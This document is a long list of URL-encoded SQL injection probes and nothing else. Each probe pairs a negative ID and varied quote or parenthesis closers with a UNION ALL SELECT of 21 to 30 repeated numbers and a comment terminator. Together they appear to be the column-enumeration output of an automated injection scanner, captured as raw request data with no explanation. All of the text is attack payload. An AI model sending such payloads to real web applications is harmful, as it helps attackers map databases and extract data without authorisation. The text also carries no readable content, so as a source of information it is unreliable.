-1256%22%29%20UNION%20ALL%20SELECT%204311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311%2C4311--%20 -5603%22%29%20UNION%20ALL%20SELECT%206467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467%2C6467--%20 -7971%22%29%20UNION%20ALL%20SELECT%208821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821%2C8821--%20 -7531%22%29%29%20UNION%20ALL%20SELECT%207223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223--%20 -9789%22%29%29%20UNION%20ALL%20SELECT%203732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732%2C3732--%20 -7905%22%29%29%20UNION%20ALL%20SELECT%207540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540%2C7540--%20 -2389%22%29%29%20UNION%20ALL%20SELECT%204961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961%2C4961--%20 -5841%22%29%29%20UNION%20ALL%20SELECT%208409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409%2C8409--%20 -2840%22%29%29%20UNION%20ALL%20SELECT%209662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662%2C9662--%20 -9817%22%29%29%20UNION%20ALL%20SELECT%202590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590%2C2590--%20 -3751%22%29%29%20UNION%20ALL%20SELECT%205566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566%2C5566--%20 -8389%22%29%29%20UNION%20ALL%20SELECT%204277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277%2C4277--%20 -3672%22%29%29%20UNION%20ALL%20SELECT%206093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093%2C6093--%20 -2728%22%29%29%29%20UNION%20ALL%20SELECT%201739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739%2C1739--%20 -4946%22%29%29%29%20UNION%20ALL%20SELECT%208764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764%2C8764--%20 -3455%22%29%29%29%20UNION%20ALL%20SELECT%203252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252%2C3252--%20 -2035%22%29%29%29%20UNION%20ALL%20SELECT%207426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426%2C7426--%20 -3919%22%29%29%29%20UNION%20ALL%20SELECT%201461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461%2C1461--%20 -9704%22%29%29%29%20UNION%20ALL%20SELECT%201043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043%2C1043--%20 -5845%22%29%29%29%20UNION%20ALL%20SELECT%209947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947%2C9947--%20 -1832%22%29%29%29%20UNION%20ALL%20SELECT%203764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764%2C3764--%20 -1293%22%29%29%29%20UNION%20ALL%20SELECT%201154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154%2C1154--%20 -6544%22%29%29%29%20UNION%20ALL%20SELECT%202727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727%2C2727--%20 -3078%22%20UNION%20ALL%20SELECT%207722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722%2C7722--%20 -8255%22%20UNION%20ALL%20SELECT%203341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341%2C3341--%20 -6471%22%20UNION%20ALL%20SELECT%204724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724%2C4724--%20 -9015%22%20UNION%20ALL%20SELECT%205634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634%2C5634--%20 -1348%22%20UNION%20ALL%20SELECT%203179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179%2C3179--%20 -2316%22%20UNION%20ALL%20SELECT%203460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460%2C3460--%20 -4629%22%20UNION%20ALL%20SELECT%201271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271%2C1271--%20 -8249%22%20UNION%20ALL%20SELECT%207044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044%2C7044--%20 -1665%22%20UNION%20ALL%20SELECT%205386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386%2C5386--%20 -2191%22%20UNION%20ALL%20SELECT%205466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466%2C5466--%20 -2693%22%29%20UNION%20ALL%20SELECT%205531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531%2C5531--%20 -1841%22%29%20UNION%20ALL%20SELECT%205605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605%2C5605--%20 -8753%22%29%20UNION%20ALL%20SELECT%202114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114%2C2114--%20 -7310%22%29%20UNION%20ALL%20SELECT%206744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744%2C6744--%20 -9445%22%29%20UNION%20ALL%20SELECT%207685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685%2C7685--%20 -7712%22%29%20UNION%20ALL%20SELECT%208904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904%2C8904--%20 -7598%22%29%20UNION%20ALL%20SELECT%208296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296%2C8296--%20 -6340%22%29%20UNION%20ALL%20SELECT%207043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043%2C7043--%20 -2915%22%29%20UNION%20ALL%20SELECT%202304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304%2C2304--%20 -6363%22%29%20UNION%20ALL%20SELECT%209041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041%2C9041--%20 -5800%22%29%29%20UNION%20ALL%20SELECT%207119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119%2C7119--%20 -6048%22%29%29%20UNION%20ALL%20SELECT%202126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126%2C2126--%20 -7860%22%29%29%20UNION%20ALL%20SELECT%202791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791%2C2791--%20 -9860%22%29%29%20UNION%20ALL%20SELECT%201947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947%2C1947--%20 -5200%22%29%29%20UNION%20ALL%20SELECT%209778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778%2C9778--%20 -5048%22%29%29%20UNION%20ALL%20SELECT%205213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213%2C5213--%20 -9195%22%29%29%20UNION%20ALL%20SELECT%204292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292%2C4292--%20 -8124%22%29%29%20UNION%20ALL%20SELECT%203956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956%2C3956--%20 -9624%22%29%29%20UNION%20ALL%20SELECT%209404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404%2C9404--%20 -3604%22%29%29%20UNION%20ALL%20SELECT%204195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195%2C4195--%20 -6655%22%29%29%29%20UNION%20ALL%20SELECT%204142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142%2C4142--%20 -4033%22%29%29%29%20UNION%20ALL%20SELECT%208446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446%2C8446--%20 -7056%22%29%29%29%20UNION%20ALL%20SELECT%201081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081%2C1081--%20 -4018%22%29%29%29%20UNION%20ALL%20SELECT%204052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052%2C4052--%20 -2150%22%29%29%29%20UNION%20ALL%20SELECT%204386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386%2C4386--%20 -8325%22%29%29%29%20UNION%20ALL%20SELECT%202890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890%2C2890--%20 -6564%22%29%29%29%20UNION%20ALL%20SELECT%208672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672%2C8672--%20 -9740%22%29%29%29%20UNION%20ALL%20SELECT%204369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369%2C4369--%20 -5716%22%29%29%29%20UNION%20ALL%20SELECT%207584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584%2C7584--%20 -5184%22%29%29%29%20UNION%20ALL%20SELECT%202540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540--%20 -1983%22%20UNION%20ALL%20SELECT%202779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779%2C2779--%20 -6986%22%20UNION%20ALL%20SELECT%207206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206%2C7206--%20 -7883%22%20UNION%20ALL%20SELECT%205724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724%2C5724--%20 -6622%22%20UNION%20ALL%20SELECT%203018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018%2C3018--%20 -6361%22%20UNION%20ALL%20SELECT%201240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240%2C1240--%20 -1746%22%20UNION%20ALL%20SELECT%205020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020--%20 -1395%22%20UNION%20ALL%20SELECT%202057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057--%20 -5077%22%20UNION%20ALL%20SELECT%203893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893%2C3893--%20 -1562%22%20UNION%20ALL%20SELECT%209888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888%2C9888--%20 -3634%22%20UNION%20ALL%20SELECT%205851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851%2C5851--%20 -8412%25%27%29%20UNION%20ALL%20SELECT%203319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319%2C3319--%20 -7796%25%27%29%20UNION%20ALL%20SELECT%204920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920%2C4920--%20 -1046%25%27%29%20UNION%20ALL%20SELECT%208598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598%2C8598--%20 -9338%25%27%29%20UNION%20ALL%20SELECT%205211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211%2C5211--%20 -6368%25%27%29%20UNION%20ALL%20SELECT%206834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834%2C6834--%20 -7082%25%27%29%20UNION%20ALL%20SELECT%205880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880%2C5880--%20 -6634%25%27%29%20UNION%20ALL%20SELECT%201533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533%2C1533--%20 -1217%25%27%29%20UNION%20ALL%20SELECT%209396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396%2C9396--%20 -3134%25%27%29%20UNION%20ALL%20SELECT%208787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787%2C8787--%20 -2467%25%27%29%20UNION%20ALL%20SELECT%209880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880--%20 -7994%25%27%29%29%20UNION%20ALL%20SELECT%201225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225%2C1225--%20 -7054%25%27%29%29%20UNION%20ALL%20SELECT%201562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562%2C1562--%20 -1793%25%27%29%29%20UNION%20ALL%20SELECT%207682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682%2C7682--%20 -2828%25%27%29%29%20UNION%20ALL%20SELECT%208343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343--%20 -9293%25%27%29%29%20UNION%20ALL%20SELECT%209536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536--%20 -1452%25%27%29%29%20UNION%20ALL%20SELECT%202275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275--%20 -9856%25%27%29%29%20UNION%20ALL%20SELECT%208275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275%2C8275--%20 -1394%25%27%29%29%20UNION%20ALL%20SELECT%204066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066%2C4066--%20 -1015%25%27%29%29%20UNION%20ALL%20SELECT%202376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376%2C2376--%20 -4932%25%27%29%29%20UNION%20ALL%20SELECT%209415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415%2C9415--%20 -9272%25%27%29%29%29%20UNION%20ALL%20SELECT%202750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750--%20 -3095%25%27%29%29%29%20UNION%20ALL%20SELECT%206147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147%2C6147--%20 -7444%25%27%29%29%29%20UNION%20ALL%20SELECT%201654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654%2C1654--%20 -1987%25%27%29%29%29%20UNION%20ALL%20SELECT%208627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627%2C8627--%20 